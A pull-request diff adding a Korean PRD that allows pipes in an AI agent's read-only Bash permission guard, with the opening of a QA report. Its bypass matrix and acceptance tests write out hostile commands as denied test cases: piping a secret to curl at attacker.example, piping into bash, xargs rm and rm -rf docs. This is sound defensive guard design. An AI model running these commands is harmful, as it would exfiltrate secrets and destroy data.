### PR TITLE
docs(prd): dev-relay-shell-pipe-allow — NL 가드 pipe 부분 허용 PRD

### DIFF
--- a/docs/prd/dev-relay-shell-pipe-allow.md
+++ b/docs/prd/dev-relay-shell-pipe-allow.md
@@ -1,0 +1,302 @@
+# PRD: Dev Manager — NL 세션 Bash 가드 pipe (`|`) 부분 허용
+
+- **slug**: `dev-relay-shell-pipe-allow`
+- **PM**: 이하영 (hayoung.lee2@musinsa.com, Slack `U0AE7A54NHL`)
+- **작성일**: 2026-05-06
+- **UI 포함 여부**: **No** (외부 노출은 NL 세션 응답 메시지만 — 상위 PRD `slack-dev-relay.md` / `dev-relay-natural-language.md` 와 동일 정책)
+- **상위 PRD**: [`docs/prd/dev-relay-natural-language.md`](./dev-relay-natural-language.md) (NL 분기 — 본 가드의 적용 대상)
+- **인접 PRD**: [`docs/prd/dev-relay-agent-integration.md`](./dev-relay-agent-integration.md), [`docs/prd/slack-dev-relay.md`](./slack-dev-relay.md)
+- **트리거**: SESSION_NOTES 2026-05-06 (오후) §"다음 세션 시작 포인트" 1번 (3세션 연속 P1, 일상 사용 차단 빈도 최고)
+- **대상 파일**: `ai/dev_relay/tool_policy.py:167-185` (`_FORBIDDEN_SHELL_METACHARS`, `_looks_mutating`, `_evaluate_bash`)
+
+---
+
+## 1. 배경 / 문제
+
+[`dev-relay-natural-language.md`](./dev-relay-natural-language.md) 에서 도입한 NL 세션 read-only 가드는 SDK 가 호출하는 `Bash` 도구 입력을 첫 토큰 화이트리스트로 검사해 통과시킨다. 그러나 현행 [`ai/dev_relay/tool_policy.py:167-185`](../../ai/dev_relay/tool_policy.py) `_FORBIDDEN_SHELL_METACHARS` 가 shell metacharacter 7종 (`>`, `>>`, `<`, `|`, `&`, `;`, `` ` ``, `$(`) 이 들어간 모든 명령을 일괄 `mutating_command` 로 거부한다. 보수적 가드 의도(metachar 우회로 화이트리스트를 통과시킨 head 와 다른 경로로 mutating op 를 실행하는 것을 막음)는 정확하나, **read-only pipe 명령마저 일괄 차단** 된다는 부작용이 있다.
+
+일상에서 자주 막히는 패턴 (실측):
+
+```text
+git log --oneline | head -10        # 거부 (양쪽 RO)
+gh pr list | grep "feat"            # 거부 (양쪽 RO)
+ls -la | grep python                # 거부 (양쪽 RO)
+cat audit.jsonl | tail -20          # 거부 (양쪽 RO)
+git diff HEAD~1 | wc -l             # 거부 (양쪽 RO)
+```
+
+세션 메모(SESSION_NOTES.md)에서 **3세션 연속 P1** 으로 올라온 사용자 페인포인트로, NL 세션의 실용성을 가장 크게 떨어뜨리는 단일 가드다. SDK 가 위 패턴을 시도할 때 가드가 거부하면 SDK 는 fallback 으로 다단계로 명령을 분리해 실행하거나(파일 임시 저장 → 재호출), "원하는 정보를 얻지 못했다"고 사용자에게 응답한다 — 두 경우 모두 응답성·정확도가 떨어진다.
+
+본 PRD 는 가드 의도를 유지하면서 **`|` (pipe) 만 부분적으로 허용** 한다. 같은 metachar 그룹의 나머지 6종(`>`, `>>`, `<`, `&`, `;`, `` ` ``, `$(`) 은 본 PRD 비범위 — 데이터(허용 후 발생 패턴)를 보고 후속 PRD 에서 결정한다.
+
+---
+
+## 2. 봇 네이밍 / 컴플라이언스 제약 재확인
+
+상위 PRD `slack-dev-relay.md` §1 ("외부 노출 텍스트 네이밍 제약") 정책을 그대로 승계한다. 본 PRD 는 **새 봇·새 표시명·새 채널 라벨·새 audit kind 를 도입하지 않는다.** 다만 새로 도입되는 코드 식별자·테스트 케이스 문자열·본 PRD 본문 자체가 컴플라이언스 가드 통과 대상이다.
+
+- 정책 단일 정의 지점: [`ai/coordinator/_compliance.py`](../../ai/coordinator/_compliance.py) `FORBIDDEN_KEYWORDS` 그대로 재사용 (별도 키워드 셋 신설 금지).
+- 본 PRD 본문에서도 봇을 통칭할 때는 "Dev Manager 봇" 으로 부른다.
+- NL 세션 응답에 새로 추가되는 안내 문구는 **본 PRD 가 새로 도입하지 않는다** — 가드 거부 사유(`reason`) 식별자 변경 또한 없다 (§3.3 참조). 응답 메시지·audit 라인 모두 기존 정책 가드 그대로 통과.
+- 본 PRD 본문 자체에 [`ai/coordinator/_compliance.py`](../../ai/coordinator/_compliance.py) `FORBIDDEN_KEYWORDS` 의 어떤 키워드도 등장하지 않도록 0 hit 유지 (구체 키워드 목록은 코드 단일 정의 지점만 참조 — PRD 본문에는 인라인 나열 금지).
+
+---
+
+## 3. 범위 (In Scope)
+
+본 PRD 는 `_evaluate_bash` 에 **pipe 분리 + segment 재귀 검증** 로직을 추가하는 데 한정한다.
+
+### 3.1 허용 metachar — `|` 만
+
+본 PRD 는 `|` (single pipe) 만 부분 허용한다. 같은 그룹의 나머지는 모두 현행 거부 정책 유지.
+
+| metachar | 본 PRD | 사유 |
+|---|---|---|
+| `\|` | **부분 허용** (segment 양쪽이 모두 read-only 일 때) | 일상 read-only 조회 패턴의 가장 큰 비중. 부작용(파일·네트워크 mutation) 없음 |
+| `>`, `>>` | 거부 유지 | 파일 redirect — 사이드이펙트 발생 |
+| `<` | 거부 유지 | 입력 redirect — 테스트 격리 측면 보수 |
+| `&` | 거부 유지 | background / chain — 실행 추적 어려움 |
+| `;` | 거부 유지 | 명령 chain — 우회 위험 (양쪽 검증 필요하지만 본 PRD 비범위) |
+| `` ` ``, `$(...)` | 거부 유지 | command substitution — 토큰화·재귀 검증 복잡 |
+
+`;` 와 `&&` 는 의미상으로는 `|` 와 비슷하게 segment 분리 + 양쪽 RO 검증이 가능하나, (a) 본 PRD 의 단순성, (b) 실측 사용 빈도가 `|` 대비 현저히 낮음, (c) 우회 시도 표면이 다름 (예: `gh pr view 1 ; rm -rf docs`) — 이유로 비범위.
+
+### 3.2 segment 분할 + 재귀 검증
+
+`_evaluate_bash` 의 첫 번째 metachar 1차 필터(`_looks_mutating`) 직전 단계에 다음 흐름을 삽입한다.
+
+1. **destructive 1차 차단 유지** — `is_destructive(raw)` 매치 시 즉시 `destructive_command` 반환. 본 PRD 는 본 가드를 우회·약화시키지 않는다.
+2. **토큰화** — `shlex.split(raw)` 로 토큰 리스트 획득. `ValueError` 시 기존대로 `parse_error` 반환.
+3. **`|` 토큰 검출**:
+   - 토큰 리스트에 `|` 가 0개면 기존 단일 명령 흐름 그대로 (회귀 0건 보장).
+   - `|` 가 1개 이상 있으면 **segment 분리** 단계로 진입.
+4. **segment 분리** — 토큰 리스트를 `|` 토큰 기준으로 분할. 각 segment 는 비어 있지 않아야 한다 (빈 segment → `parse_error`). segment 수 상한은 §3.4 참조.
+5. **다른 forbidden metachar 잔존 검사** — 분리 후 각 segment 의 raw 텍스트(또는 토큰 join 결과)에 `_FORBIDDEN_SHELL_METACHARS` 의 `|` 외 6종이 들어 있으면 `mutating_command` 반환. (예: `cat a | tee b > out.txt` 는 거부 유지 — `>` 가 잔존.)
+6. **각 segment 재귀 검증** — 각 segment 의 raw 텍스트를 만들어 `_evaluate_bash` **재귀 호출**. 모든 segment 가 `allowed=True` 인 경우에만 최종 `allowed=True` 반환. 한 segment 라도 거부되면 그 segment 의 `reason` 을 그대로 최종 reason 으로 사용 (audit 가독성 유지).
+7. **재귀 깊이 보호** — 본 PRD 는 `|` 만 허용하므로 재귀 깊이는 사실상 1 (segment 내부에 또 다른 `|` 는 없도록 분할됨). 그래도 의도치 않은 무한 재귀 방지를 위해 `_evaluate_bash` 에 internal depth parameter (default 0, max 1) 를 추가한다 — depth >= 1 인 호출에서 또 segment 분기에 진입하면 `parse_error` 로 fail-fast.
+
+### 3.3 거부 사유 식별자 (reason) 정책
+
+기존 reason 식별자(`empty_command`, `destructive_command`, `mutating_command`, `parse_error`, `not_whitelisted`) 를 그대로 사용한다. 본 PRD 는 신규 reason 을 추가하지 않는다.
+
+- segment 양쪽이 RO 인데 segment 수가 상한 초과 → `parse_error` (재귀 깊이 보호 흐름과 동일 식별자).
+- segment 한쪽이 mutating head → 그 segment 의 기존 reason (`mutating_command` 또는 `not_whitelisted`) 그대로 전파.
+- segment 분리 후 다른 metachar 잔존 → `mutating_command` (현행 `_looks_mutating` 의 reason 과 동일).
+
+이유: (a) audit 분석 도구·QA 자동화가 reason 식별자에 의존, (b) 컴플라이언스 가드를 통과한 식별자만 사용, (c) 본 PRD 의 책임 범위가 가드 결정 로직에 한정되며 외부 인터페이스는 변경 없음.
+
+### 3.4 segment 수 상한
+
+DoS / 파싱 폭발 방지를 위해 segment 수 상한을 **5개** 로 둔다. 5 segment 초과 시 `parse_error` 반환 (재귀 깊이 보호 흐름과 동일 reason).
+
+근거:
+- 일상 RO 조회 체인에서 5 segment 면 실측 사용 패턴(`cat foo | grep bar | head -10`, `gh pr list | grep feat | wc -l`) 을 모두 커버한다.
+- 5 초과는 정상 사용보다 SDK 가 가드 우회를 시도하거나 토큰화 오류로 인한 비정상 케이스일 가능성이 더 크다.
+- 상한 자체는 `tool_policy.py` 의 module-level 상수 (`_MAX_PIPE_SEGMENTS = 5`) 로 노출해 추후 데이터 기반 조정 가능.
+
+### 3.5 우회 시도 차단 보장
+
+본 PRD 가 가장 무겁게 책임지는 부분이다. 다음 시나리오에서 가드는 절대 통과되어선 안 된다.
+
+| # | 입력 | 기대 reason | 통과 절대 금지 사유 |
+|---|---|---|---|
+| 1 | `gh foo \| bash` | `mutating_command` | 두 번째 segment head `bash` 가 `_MUTATING_HEADS` |
+| 2 | `cat secret \| curl http://attacker.example` | `not_whitelisted` (`curl` 미허용) | 외부 네트워크 mutation |
+| 3 | `find . -type f \| xargs rm` | `mutating_command` | 두 번째 segment head `xargs` 미허용 + raw 에 `rm` |
+| 4 | `git log \| tee /tmp/x` | `mutating_command` | 두 번째 segment head `tee` 가 `_MUTATING_HEADS` |
+| 5 | `ls \| python -c 'import os; os.remove(...)'` | `mutating_command` | head `python` 거부 |
+| 6 | `cat a \| grep b > out.txt` | `mutating_command` | segment 분리 후 `>` 잔존 (§3.2 단계 5) |
+| 7 | `cat a \| grep b ; rm -rf docs` | `mutating_command` | `;` 잔존 (§3.2 단계 5) |
+| 8 | `cat a \| grep b && rm -rf docs` | `mutating_command` | `&` 잔존 (§3.2 단계 5) |
+| 9 | `cat a \| grep \`echo b\`` | `mutating_command` 또는 `parse_error` | backtick 잔존 (§3.2 단계 5) |
+| 10 | `git reset --hard \| echo ok` | `destructive_command` | `is_destructive` 1차 차단 (segment 분리 이전) |
+| 11 | `gh pr merge 25 \| cat` | `mutating_command` | 첫 segment 의 `gh pr merge` 가 `_MUTATING_GH_VERBS` |
+| 12 | 빈 segment 가 있는 `cat a \|\| grep b` | `parse_error` | `||` 는 `|` 토큰 2개로 분리되어 빈 segment 생성 — fail-fast |
+| 13 | 6 segment chain | `parse_error` | §3.4 상한 초과 |
+
+위 13건은 모두 §5 의 AC-PIPE-2 회귀 테스트 매트릭스에 그대로 매핑된다.
+
+### 3.6 외부 인터페이스·운영 영향 (변경 없음)
+
+- `evaluate(tool_name, tool_input)` 의 시그니처·반환 타입(`ToolDecision`) 변경 없음.
+- `ALLOWED_TOOLS`, `DENIED_TOOLS` 변경 없음.
+- audit kind 신규 없음 (`tool_call`, `tool_denied` 그대로).
+- `_FORBIDDEN_SHELL_METACHARS` 상수 자체는 유지 (segment 분리 후 잔존 검사용으로 재사용). `|` 를 상수에서 제거하지 않고, segment 분리 흐름이 `|` 를 만나면 우선 분리하도록 호출 순서로 처리한다 — 이렇게 하면 단일 명령 흐름의 `|` 검출 회귀가 발생하지 않는다.
+- NL 세션 응답 메시지 변경 없음 — 사용자 입장에서는 "전에 막혔던 명령이 이제 통과된다" 만 체감.
+
+---
+
+## 4. 비범위 (Out of Scope)
+
+- **`;`, `&&`, `||`, `>`, `>>`, `<`, `&`, `` ` ``, `$(...)` 허용** — 본 PRD 는 `|` 만. 위 메타들은 데이터(`|` 허용 후 1~2주 사용 패턴)를 보고 후속 PRD `dev-relay-shell-chain-allow` (가칭) 에서 결정.
+- **새로운 read-only head 화이트리스트 추가** — `awk`, `sed`, `xargs`, `cut`, `sort`, `uniq`, `jq`, `column`, `less`, `more` 등 자주 쓰이는 RO head 의 화이트리스트 진입은 본 PRD 비범위. 본 PRD 는 **기존 화이트리스트 head 끼리의 pipe** 만 허용.
+- **POSIX 호환 풀 파서** — `shlex` 수준 토큰화로 충분. nested quote, escaped pipe(`\|`), heredoc, fd redirect (`2>&1`) 등은 보수적으로 거부 또는 `parse_error`.
+- **NL 분기 외 경로** — `dev-relay-agent-integration.md` 의 reviewer/devops 호출 경로는 별도. dispatcher destructive 가드는 본 PRD 와 독립.
+- **Phase 2 write 도구 허용** — `dev-relay-write-tools` (별도 PRD) 와 무관.
+- **사용자 응답 메시지 개선** — 가드 거부 시 사용자에게 "왜 막혔는지" 더 친절히 안내하는 작업은 본 PRD 비범위 (현행 SDK fallback 메시지 그대로).
+
+---
+
+## 5. 수용 기준 (Acceptance Criteria)
+
+검증은 단위 테스트 (`ai/tests/dev_relay/test_tool_policy.py` 기존 패턴 그대로 확장) 로 자동화한다. 수동 검증은 §8.2 참조.
+
+### AC-PIPE-1. 양쪽 RO `|` 명령 허용
+
+- **재현**: `evaluate("Bash", {"command": "<cmd>"})` 호출.
+- **기대**: 다음 명령은 모두 `allowed=True`, `reason=None` 반환.
+
+```text
+git log --oneline | head -10
+git log -n 5 | wc -l
+gh pr list --state open | grep feat
+gh pr list | head -20
+ls -la | grep python
+ls docs/prd | wc -l
+cat README.md | head -50
+cat docs/HANDOFF.md | tail -20
+git diff HEAD~1 | wc -l
+git status | head
+find docs -name '*.md' | wc -l
+gh issue list | head -10
+```
+
+각 케이스는 `TestBashPipeAllowed` (신규) 의 parametrize 로 등록.
+
+### AC-PIPE-2. 우회 시도 13종 거부 (회귀 매트릭스)
+
+- **재현**: §3.5 표의 13건 입력을 parametrize 로 등록.
+- **기대**: 모두 `allowed=False`, `reason` 이 §3.5 표의 기대 reason 중 하나에 매치.
+- 신규 클래스 `TestBashPipeBypassDenied` 에 위치.
+
+### AC-PIPE-3. 기존 단일 명령 회귀 0건
+
+- **재현**: 기존 `TestBashReadOnlyAllowed`, `TestBashMutatingDenied`, `TestBashDestructiveDenied` 의 모든 parametrize 케이스.
+- **기대**: 본 PRD 변경 후에도 모든 케이스가 변경 전과 동일한 `allowed` / `reason` 반환. (단, `cat a | tee b` 케이스는 §3.5 #4 와 동일하게 `mutating_command` 거부 유지 — 두 번째 segment `tee` 가 mutating head.)
+
+### AC-PIPE-4. segment 수 상한
+
+- **재현**: `cat a | grep b | head | tail | wc -l | cat` (6 segment).
+- **기대**: `allowed=False`, `reason="parse_error"`.
+- 5 segment (`cat a | grep b | head | tail | wc -l`) 는 모든 segment 가 RO 이면 `allowed=True`.
+
+### AC-PIPE-5. 빈 segment / 토큰화 오류
+
+- **재현**:
+  - `cat a || grep b` (`||` 는 토큰 분리 후 빈 segment 발생) → `parse_error`.
+  - `cat 'unclosed quote` → `parse_error` (기존 동작 유지).
+  - `| cat README.md` (앞 빈 segment) → `parse_error`.
+  - `cat README.md |` (뒤 빈 segment) → `parse_error`.
+
+### AC-PIPE-6. destructive 1차 차단 우선순위
+
+- **재현**: `git reset --hard HEAD~5 | echo ok`, `git push --force | cat`.
+- **기대**: `allowed=False`, `reason="destructive_command"` (segment 분리 이전 단계에서 차단 — §3.2 단계 1).
+
+### AC-PIPE-7. 다른 metachar 잔존 거부
+
+- **재현**:
+  - `cat a | grep b > out.txt` → `mutating_command`.
+  - `cat a | grep b ; rm c` → `mutating_command`.
+  - `cat a | grep b && rm c` → `mutating_command`.
+  - `cat a | grep \`echo b\`` → `mutating_command` 또는 `parse_error`.
+
+### AC-PIPE-8. 컴플라이언스 정적 검사
+
+- **재현**: `_compliance.py` 의 `FORBIDDEN_KEYWORDS` 셋을 패턴으로 사용해 (예: `grep -inEf <패턴파일>` 또는 `python -c "from ai.coordinator._compliance import FORBIDDEN_KEYWORDS; ..."`) 본 PRD 본문, `ai/dev_relay/tool_policy.py` diff, `ai/tests/dev_relay/test_tool_policy.py` 신규/변경 케이스를 정적 스캔.
+- **기대**: 0 hit. 본 PRD 본문, 코드 변경 diff, 테스트 케이스 문자열 모두 도메인 키워드 부재.
+- 기존 `ai/tests/dev_relay/test_compliance.py` 의 정적 검사가 신규 변경을 자동 커버하는지 확인 (개별 파일 화이트리스트 누락 시 보강).
+
+### AC-PIPE-9. NL 통합 회귀
+
+- **재현**: `ai/tests/dev_relay/test_agent_integration.py` 또는 `test_handle_command_nl.py` 의 NL fixture 가 SDK 의 `Bash` 호출을 mock 하는 시나리오에서, mock SDK 가 `git log | head` 같은 명령을 시도하면 가드 통과 후 명령 결과가 NL 세션 응답에 정상 반영.
+- **기대**: NL 응답 메시지에 가드 거부 fallback (`tool_denied`) 이 들어가지 않음. (단위 테스트로 충분 — 실 SDK 호출은 §8.2 의 수동 검증 영역.)
+
+---
+
+## 6. 가정 · 제약
+
+### 6.1 기술
+
+- Python 3.11+, `shlex` 표준 라이브러리. 신규 의존성 추가 없음.
+- 본 PRD 변경의 영향 범위는 `ai/dev_relay/tool_policy.py` 단일 파일. 호출 측(`agent_runner.py` 의 PreToolUse hook) 은 변경 없음.
+- `shlex.split` 의 default mode (POSIX) 사용. Windows 경로 escape 같은 엣지는 고려하지 않음 (저장소 전체가 macOS/Linux 만 지원).
+
+### 6.2 보안
+
+- 본 PRD 는 **read-only 영역의 표면을 늘리지 않는다**. `_READONLY_BASH_HEAD`·`_READONLY_GIT_SUB`·`_READONLY_GH_SUB` 화이트리스트는 그대로다. `|` 를 통해 화이트리스트 외 head 가 통과될 경로가 발생하지 않음을 §3.5 의 13건 회귀 매트릭스로 보장.
+- destructive 가드(`is_destructive`) 는 segment 분리 **이전** 단계에서 동작. `git push --force | cat` 는 segment 분리 전에 차단 (AC-PIPE-6).
+- segment 수 상한 5 는 DoS 방지. `shlex.split` 자체의 토큰화 폭발은 별도 보호가 없으나, NL 세션 input 의 길이 제한(`dev-relay-natural-language.md` §3.1) 이 1차 보호.
+
+### 6.3 일정 / 운영
+
+- 로컬 데몬 코드 한정. CI / 배포 / 인프라 변경 없음.
+- 로컬 audit.jsonl 형식 변경 없음 — 분석 스크립트·로테이션 정책 영향 없음.
+- 본 PRD 머지 후, 1~2주간 `tool_call` / `tool_denied` audit 라인을 사용자 본인이 가볍게 모니터링 — `|` 허용 후 발생한 새로운 우회 시도 패턴이 있는지 확인. 실측 데이터를 후속 PRD (`;`, `>` 등) 입력으로 사용.
+
+### 6.4 비용
+
+- SDK 토큰 비용 영향 없음 (가드는 SDK 호출 전 PreToolUse hook). 오히려 가드 통과율이 높아져 SDK 가 fallback 으로 다단계 명령을 시도하던 경우(파일 임시 저장 → 재호출) 가 줄어 토큰 절약 효과 가능 — 본 PRD 의 부수적 이득이며 수치 측정은 본 PRD 비범위.
+
+---
+
+## 7. 위험 / 의존
+
+1. **새로운 우회 패턴 발견** — `|` 허용 후 SDK 가 우리가 §3.5 에서 예상하지 못한 패턴으로 화이트리스트를 우회하는 경우. 1차 방어는 §3.5 회귀 매트릭스. 2차 방어는 `tool_denied` audit 라인의 사용자 본인 모니터링 (§6.3). 새 패턴 발견 시 hotfix PR 로 매트릭스에 추가.
+2. **`shlex.split` 의 escape 처리 차이** — `cat 'a | b' | grep c` 같은 quoted pipe 는 `shlex.split` 이 단일 토큰으로 묶어 `|` 토큰이 1개만 잡힌다 (의도된 동작). 단위 테스트에 quoted pipe 케이스 1건 추가 필요.
+3. **2차 재귀 호출 비용** — `_evaluate_bash` 가 segment 별로 재귀 호출되면 호출 횟수가 1 + N (segment 수) 이 된다. 상한 5 + depth 1 제약으로 worst case 6회 — 성능 영향 무시 가능.
+4. **`is_destructive` 와의 상호작용** — destructive 1차 차단은 raw 텍스트 부분 문자열 매치. `git log | git reset --hard` 같은 입력에서 `git reset --hard` 가 raw 에 들어 있으므로 segment 분리 이전에 차단됨. 의도된 동작이므로 회귀 테스트로 명시 (AC-PIPE-6 의 두 번째 케이스).
+5. **`tee` 의 mutating 분류** — `tee` 는 파일 쓰기 도구이므로 `_MUTATING_HEADS` 에 포함되어 있다. `cat a | tee b` 는 거부 유지 — 의도된 회귀 (§3.5 #4). `tee` 를 RO 로 재분류하는 것은 본 PRD 비범위.
+6. **NL 분기 외 경로 회귀** — 본 PRD 는 NL 세션 가드 (`tool_policy.py`) 만 변경. dispatcher 의 destructive 가드 (`is_destructive`) 와 reviewer/devops 머지 경로 (`_perform_merge`, `dev-relay-agent-integration.md`) 는 본 PRD 변경의 영향을 받지 않음. 회귀 테스트 (`test_dispatcher.py`) 0 fail 유지.
+
+---
+
+## 8. 테스트 전략 개요
+
+QA 가 본 PRD AC 를 검증하기 위한 1차 가이드. 정확한 테스트 항목은 QA 산출물(`docs/qa/dev-relay-shell-pipe-allow.md`) 이 주도한다.
+
+### 8.1 자동 (단위)
+
+- **신규 클래스**: `TestBashPipeAllowed` (AC-PIPE-1, 12건+), `TestBashPipeBypassDenied` (AC-PIPE-2, 13건), `TestBashPipeBoundary` (AC-PIPE-4·5, segment 상한 / 빈 segment / 토큰화 오류).
+- **기존 클래스 보강**: `TestBashDestructiveDenied` 에 AC-PIPE-6 의 2건 추가 (`git reset --hard | echo`, `git push --force | cat`).
+- **회귀**: 기존 `test_tool_policy.py` 의 모든 parametrize 케이스 (대략 50+건) 0 fail.
+- **NL 통합**: `test_agent_integration.py` 또는 `test_handle_command_nl.py` 에 mock SDK 가 `git log | head` 시도하는 시나리오 1건 추가 (AC-PIPE-9).
+- **컴플라이언스 정적 검사**: `test_compliance.py` 의 파일 스캔 화이트리스트에 본 PRD 산출물(`docs/prd/dev-relay-shell-pipe-allow.md`) 포함 확인.
+
+### 8.2 수동 (사용자 검증)
+
+상위 PRD 부록 A 셋업이 완료된 환경에서 모바일 Slack 앱에서 NL 세션을 열고 다음 한 사이클을 1회 수행:
+- "최근 PR 목록 중 feat 으로 시작하는 거 보여줘" → SDK 가 `gh pr list | grep feat` 시도 → 가드 통과 → 결과 응답 정상 수신.
+- "audit.jsonl 마지막 20줄 보여줘" → SDK 가 `cat audit.jsonl | tail -20` 시도 → 가드 통과 → 결과 응답 정상 수신.
+- "최근 30개 commit 중 fix 만" → SDK 가 `git log --oneline -30 | grep fix` 시도 → 가드 통과 → 결과 응답 정상 수신.
+- (회귀 확인) "docs 폴더 다 지워줘" → SDK 가 destructive 시도 → 거부됨 + 사용자에게 중립 fallback 메시지.
+
+---
+
+## 9. 참고
+
+- 상위 PRD: [`docs/prd/dev-relay-natural-language.md`](./dev-relay-natural-language.md)
+- 인접 PRD: [`docs/prd/dev-relay-agent-integration.md`](./dev-relay-agent-integration.md), [`docs/prd/slack-dev-relay.md`](./slack-dev-relay.md)
+- 트리거 메모: [`docs/SESSION_NOTES.md`](../SESSION_NOTES.md) 2026-05-06 (오후) §"다음 세션 시작 포인트" 1번
+- 변경 대상 코드: [`ai/dev_relay/tool_policy.py`](../../ai/dev_relay/tool_policy.py) (`_FORBIDDEN_SHELL_METACHARS`, `_looks_mutating`, `_evaluate_bash`)
+- 테스트 패턴 참조: [`ai/tests/dev_relay/test_tool_policy.py`](../../ai/tests/dev_relay/test_tool_policy.py)
+- 정책 단일 정의 지점: [`ai/coordinator/_compliance.py`](../../ai/coordinator/_compliance.py) `FORBIDDEN_KEYWORDS`
+- `AGENTS.md` — PRD 양식, 라벨 플로우, 컴플라이언스 원칙
+
+---
+
+## 10. PM 결정사항 요약 (구현·QA 가 한눈에 보도록)
+
+| 항목 | 결정 |
+|---|---|
+| 본 PRD 책임 범위 | NL 세션 Bash 가드 `_evaluate_bash` 의 `\|` 부분 허용. 동일 그룹 다른 metachar 6종은 비범위 |
+| 허용 metachar | `\|` 만. `;`, `&&`, `\|\|`, `>`, `>>`, `<`, `&`, `` ` ``, `$(...)` 모두 거부 유지 |
+| 검증 방식 | `shlex.split` 토큰화 → `\|` 토큰 기준 segment 분할 → 각 segment 를 `_evaluate_bash` 재귀 호출 → 모두 allowed 일 때만 최종 allowed |
+| segment 수 상한 | 5. 초과 시 `parse_error`. 모듈 상수 `_MAX_PIPE_SEGMENTS` 로 노출 |
+| 재귀 깊이 보호 | `_evaluate_bash` 에 internal depth parameter (default 0, max 1). 초과 시 `parse_error` |
+| destructive 가드 우선순위 | segment 분리 이전 단계 — `is_destructive(raw)` 매치 시 즉시 `destructive_command` |
+| 다른 metachar 잔존 | segment 분리 후 잔존 metachar 6종 발견 시 `mutating_command` |
+| 신규 reason 식별자 | **없음** — 기존 reason 그대로 재사용 (audit 호환성) |
+| 신규 read-only head 화이트리스트 | **없음** — 기존 head 끼리의 pipe 만 허용 |
+| 외부 인터페이스 변경 | **없음** — `evaluate()` 시그니처·반환 타입·`ALLOWED_TOOLS`/`DENIED_TOOLS`·audit kind 모두 그대로 |
+| 운영 모니터링 | 머지 후 1~2주간 `tool_denied` audit 라인 사용자 본인 가볍게 모니터링 → 후속 PRD (`;`, `>` 등) 입력 |

--- a/docs/qa/dev-relay-agent-integration.md
+++ b/docs/qa/dev-relay-agent-integration.md
@@ -1,0 +1,272 @@
+# QA: dev-relay-agent-integration
+
+> 작성자: QA (자동 검증 + 정적 검사 — 수동 검증 별도 가이드)
+> 작성일: 2026-05-06
+> 입력 PRD: [`docs/prd/dev-relay-agent-integration.md`](../prd/dev-relay-agent-integration.md)
+> 검증 대상 PR: [#43](https://github.com/deeptrading-lab/trading-signal-engine/pull/43) (`feature/dev-relay-agent-integration`)
+> 변경 규모: +2455 / -52, 17 files, 4 commits (worker → reviewer → merger → main 통합)
+> 회귀: `python3 -m pytest ai/tests/` → **613 passed (1.49s, 0 failed)**
+> 회귀 (dev_relay 한정): `python3 -m pytest ai/tests/dev_relay/` → **439 passed (1.28s, 0 failed)**
+
+---
+
+## 0. 요약
+
+- **자동 검증 통과**: AC-INT-1·2·3·4·5·6·7·8 8건 모두 PASS — 단위·통합(mock) 자동 테스트로 라이프사이클 / payload 라우팅 / 분류 매핑 / audit kind / destructive 가드 / 컴플라이언스 정적 스캔이 모두 검증됨.
+- **자동 검증 항목 매핑**:
+  - AC-INT-1: `test_agent_integration.py::TestReviewerThenMergeRoundTrip`, `test_reviewer.py::TestReviewResultBlocksWithV2Payload::test_button_value_contains_pr_number`
+  - AC-INT-2: `test_agent_integration.py::TestReviewerThenMergeRoundTrip::test_review_pr_then_approve_merge`, `test_merger.py::TestPerformMerge`, `test_merger.py::TestValidateApproval`
+  - AC-INT-3: `test_worker.py::TestJobPickerLifecycle::test_concurrency_second_job_waits`, `test_agent_integration.py::TestConcurrencyAcInt3`
+  - AC-INT-4: `test_worker.py::TestJobPickerLifecycle::test_picker_processes_pending_job`, `test_worker.py::TestClaimNextPending`, `test_agent_runner_shutdown.py` (PR #37 회귀)
+  - AC-INT-5: `test_failures.py::TestUserMessageMapping`, `test_failures.py::TestClassifyGithubStatus`, `test_failures.py::TestClassifyException`, `test_merger.py::TestClassifyMergeStderr`, `test_agent_integration.py::TestFailureClassificationMatrixAcInt5`
+  - AC-INT-6: `test_agent_integration.py::TestReviewerThenMergeRoundTrip` (kinds 4종) + `ai/dev_relay/main.py:1001/1012/1097` (`reviewer_started/failed/done` 직렬화) + `main.py:729/760/784` (`merge_started/done/failed` 직렬화) + `main.py:860` (`reviewer_detail_lookup_failed`)
+  - AC-INT-7: `test_merger.py::TestDispatcherDoesNotBlockGhMerge::test_dispatcher_allows_gh_pr_merge` + `test_dispatcher_still_blocks_known_destructive`, `test_agent_integration.py::TestApprovalRejectsMismatchedPayload`
+  - AC-INT-8: `test_compliance.py::test_prd_agent_integration_body_outside_code_is_clean`, `test_compliance.py::test_dev_relay_source_clean[*]`, `test_compliance.py::TestBlockKitBuildersClean`, `test_compliance.py` 17개 정적 템플릿 파라미터화 + 7개 신규 PRD 산출물(템플릿) 추가
+- **수동 검증 (PRD §8.2)**: 모바일 Slack 환경 부재 — 본 세션에서 미수행. 후속 세션에서 사용자가 직접 1 사이클 (review pr <N> → 결과 + 발견 사항 + `[머지 검토]` `[상세 보기]` → confirm → `[승인]` → 머지 결과) 검증 권장. PRD §8.2 가이드 그대로 진행 가능 — 모든 자동 가드(컴플라이언스·destructive·payload validation)가 통과한 상태이므로 수동 1 사이클로 충분.
+- **회귀 0건**. 도메인 키워드 평문 누출 0건 (PRD 본문·신규 dev_relay 모듈·신규 정적 템플릿 17종 모두 정적 스캔 통과).
+- **최종 판정**: `qa-passed` — AC 8/8 통과.
+
+---
+
+## 1. PRD 수용 기준 검증
+
+### AC-INT-1. reviewer 결과 + Block Kit 버튼 — PASS (자동)
+
+| 재현 | 기대 | 실제 |
+|------|------|------|
+| `JobPicker` 가 dequeue 한 `review pr 22` job 을 reviewer mock 으로 처리 → `ReviewResult(summary, findings, detail)` 반환 → `build_review_result_blocks` 가 Block Kit 메시지 빌드 | (a) 같은 thread 결과 메시지 1건, (b) 요약 2~3 문장, (c) 발견 사항 ≤3건 / "특이사항 없음", (d) `[머지 검토]` `[상세 보기]` 버튼, (e) `[머지 검토]` payload value 에 PR 번호 포함, (f) audit `reviewer_started` → `reviewer_done` 순서 | PASS — `test_agent_integration.py::TestReviewerThenMergeRoundTrip::test_review_pr_then_approve_merge` 가 picker → reviewer → cache → audit 순서를 검증. `[머지 검토]` value 포맷 `pr=<N>;key=<idempotency_key>;job=<job_id>` 는 `test_reviewer.py::TestReviewResultBlocksWithV2Payload::test_button_value_contains_pr_number` 로 보장 (PRD §3.2 contract). `slack_renderer.build_review_result_blocks` 에서 findings 가 None 이면 "특이사항 없음" 섹션 발사 (`test_compliance.py::TestBlockKitBuildersClean::test_review_result_blocks_no_findings`). |
+
+### AC-INT-2. `[승인]` → 실 머지 — PASS (자동)
+
+| 재현 | 기대 | 실제 |
+|------|------|------|
